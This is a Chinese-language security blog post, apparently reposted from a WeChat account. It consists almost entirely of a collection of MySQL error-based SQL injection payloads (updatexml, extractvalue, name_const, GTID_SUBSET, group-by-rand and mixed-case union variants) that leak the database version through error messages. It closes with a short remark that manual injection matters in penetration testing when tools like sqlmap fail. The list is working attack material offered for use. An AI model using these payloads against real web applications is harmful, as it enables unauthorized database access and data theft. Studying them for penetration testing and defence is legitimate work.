MySQL Error-Based型盲注Payload大全

'-(select*from(select name_const(version(),1),name_const(version(),1))p)#

'=0 group by elt(rand(),version())having min(0)#

'/updatexml(0,concat(0xa,version()),0)#

'/updatexml(0,concat('$_',version()),0)#

'-updatexml(1,concat('a=.',version()),1)#

'-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#

'/polygon((select*from(select name_const(version(),1))o))#

'--~(select*from(select@@version)f)#

'-~(select*from(select@@version)x)*2#

1e308'*(select*from(select@@version)x)#

'-(select~b*a*a*a from(select~0/.1 a,version()b)x)#

'-GTID_SUBSET(@@version,0)#

'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#

'=0 group by elt(rand(),version())having sum(0)#

'|updatexml(1,concat('a=.',version()),1)#

'|updatexml(0,concat('$_',version()),2)#

'-updatexml(0,concat(0x1,version()),2)#

'|polygon((select*from(select name_const(version(),1))x))#

'|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#

1e308'*(select*from(select@@version)x)#

'--~(select*from(select@@version)f)#

'|(~(select*from(select@@version)f)*2)#

'|~(select*from(select@@version)x)*cast(1e99as decimal(65))#

'|GTID_SUBSET(@@version,0)#

'|(select*from(select name_const(version(),1),name_const(version(),1))a)#

'||1 group by mid(version(),rand())having min(1)#

'|UpdateXML(1,concat('/',version()),1)#

'|UpdateXML(1,concat('$_',version()),1)#

'|ExtractValue(1,concat('/a[x=y]',version()))#

'|Polygon((select*from(select name_const(version(),1))b))#

'|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#

'|(select!x-~0.FROM(select+version()x)f)#

'|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#

'|(select pow(2,~x)FROM(select+version()x)z)#

'|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#

'|GTID_SUBSET(version(),0)#

'||1 group by concat(left(version(),9),rand(0)|0) having max(0)#

'|(select!x-~0.FROM(select+version()x)f)#

'-updatexml(1,concat('.a=a',version()),1)#

'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),'

' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` group By CoNcAt(version(), rand(RaNd(4) * 2)), '

' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), '

'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),'

' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), '

小歪说道：盲注型注入在渗透过程中是很常见的，可以使用sqlmap来进行注入，但是，工具毕竟只是工具，有时会失效，所以掌握手工注入手法是很重要的，手工和工具结合是最有效的。

本文始发于微信公众号（关注安全技术）：MySQL Error-Based型盲注Payload大全